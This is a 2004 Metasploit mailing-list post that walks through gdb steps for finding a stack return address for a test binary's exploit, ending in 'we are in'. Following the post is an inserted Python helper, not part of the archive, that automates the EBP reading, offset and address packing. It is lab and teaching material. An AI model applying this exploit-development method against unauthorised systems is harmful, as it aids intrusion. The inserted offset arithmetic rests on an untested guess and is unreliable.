Metasploit mailing list archives
FW: SDK Questions
From: bazarova at anz.com (Bazarov, Alexey)
Date: Thu, 12 Aug 2004 17:04:56 +1000
Well, it is not a big deal; sure, in the real world it never happened, but at least in my presentation for my team I will be able to demonstrate a full cycle of the exploit development process with a working exploit :))

Just some plays with gdb:

1) start gdb "vuln_1"
2) disas main
3) get the address of the first line; in my case it is 0x080484D0 (should be the same as I know ELF structure?)
4) break *0x080484D0
5) run
6) gdb gets stopped almost immediately
7) info reg, looking for the value of EBP; it is always different - 0xBFFFE708
8) add 16 bytes to this address (it seems that 8 bytes should be OK, but I didn't test it yet) = 0xBFFFE718
9) continue gdb
10) use this address to change the corresponding value in the exploit module
11) start metasploit
12) configure exploit with payload and target
13) exploit - yes! we are in

Thank you guys
Alex
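The gdb procedure in the post above, scripted so the EBP measurement and the "add 16 bytes" arithmetic can be re-run against the binary instead of copied by hand. This is an added example, not code from the post or from Metasploit. The binary name vuln_1 and the breakpoint address 0x080484d0 are taken from the post; the sample gdb output, the bad-character set and the function names are assumptions made here.

```python
"""Automate the gdb steps from the post: break at main's first
instruction, read EBP, add an offset, and emit the value in the forms
a stack-overflow exploit module needs (hex and packed little-endian)."""
import re
import subprocess
from typing import List

# Constructed sample of gdb's "info registers ebp" output, not captured
# from the poster's session; the register value matches the post.
SAMPLE_INFO_REG = """\
Breakpoint 1, 0x080484d0 in main ()
ebp            0xbfffe708\t0xbfffe708
"""

EBP_RE = re.compile(r"^ebp\s+(0x[0-9a-fA-F]+)", re.MULTILINE)


def gdb_batch_argv(binary: str, break_addr: int) -> List[str]:
    """Steps 1-7 as one non-interactive gdb invocation (-q, -batch and
    -ex are real gdb flags). The breakpoint address is the one the
    caller read from `disas main`."""
    return [
        "gdb", "-q", "-batch",
        "-ex", f"break *0x{break_addr:08x}",
        "-ex", "run",
        "-ex", "info registers ebp",
        binary,
    ]


def parse_ebp(info_reg_output: str) -> int:
    """Step 7: pull EBP out of gdb's register dump. Raises if there is
    no ebp line (breakpoint never hit) instead of silently returning 0."""
    m = EBP_RE.search(info_reg_output)
    if m is None:
        raise ValueError("no ebp line in gdb output; did the breakpoint hit?")
    return int(m.group(1), 16)


def candidate_return_address(ebp: int, offset: int = 16) -> int:
    """Step 8: the post adds 16 bytes to EBP (and guesses 8 may do)."""
    return (ebp + offset) & 0xFFFFFFFF


def pack_le32(addr: int) -> bytes:
    """The address as it must appear in the overflow buffer (x86 is
    little-endian), i.e. the bytes to paste into the exploit module."""
    return addr.to_bytes(4, "little")


def has_badchars(data: bytes, badchars: bytes = b"\x00\x0a\x0d") -> bool:
    """Assumed bad-character set for a string-copy overflow; the post
    does not say which bytes vuln_1 rejects, so adjust as needed."""
    return any(b in badchars for b in data)


def find_return_address(binary: str, break_addr: int, offset: int = 16) -> int:
    """Run gdb for real (steps 1-9) and return the candidate address.
    Stack addresses move with environment size and any stack
    randomisation, so the value is re-measured per run, not hard-coded."""
    proc = subprocess.run(gdb_batch_argv(binary, break_addr),
                          capture_output=True, text=True, check=False)
    return candidate_return_address(parse_ebp(proc.stdout), offset)


if __name__ == "__main__":
    ebp = parse_ebp(SAMPLE_INFO_REG)
    ret = candidate_return_address(ebp)
    packed = pack_le32(ret)
    print(f"EBP=0x{ebp:08x} ret=0x{ret:08x} bytes={packed!r} "
          f"badchars={has_badchars(packed)}")
```

Only find_return_address actually launches gdb; the other functions work on captured text, which is what the constructed sample exercises. Since the measured EBP depends on the environment the process is started with, measure it on the machine and in the shell the exploit will run against rather than carrying a value over from another session, and check the packed bytes for bad characters before putting them in the module.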
Current thread:
- FW: SDK Questions Bazarov, Alexey (Aug 10)
- <Possible follow-ups>
- FW: SDK Questions ninjatools at hush.com (Aug 11)
- FW: SDK Questions Bazarov, Alexey (Aug 11)
- FW: SDK Questions Steve Bonds (Aug 11)
- FW: SDK Questions Bazarov, Alexey (Aug 12)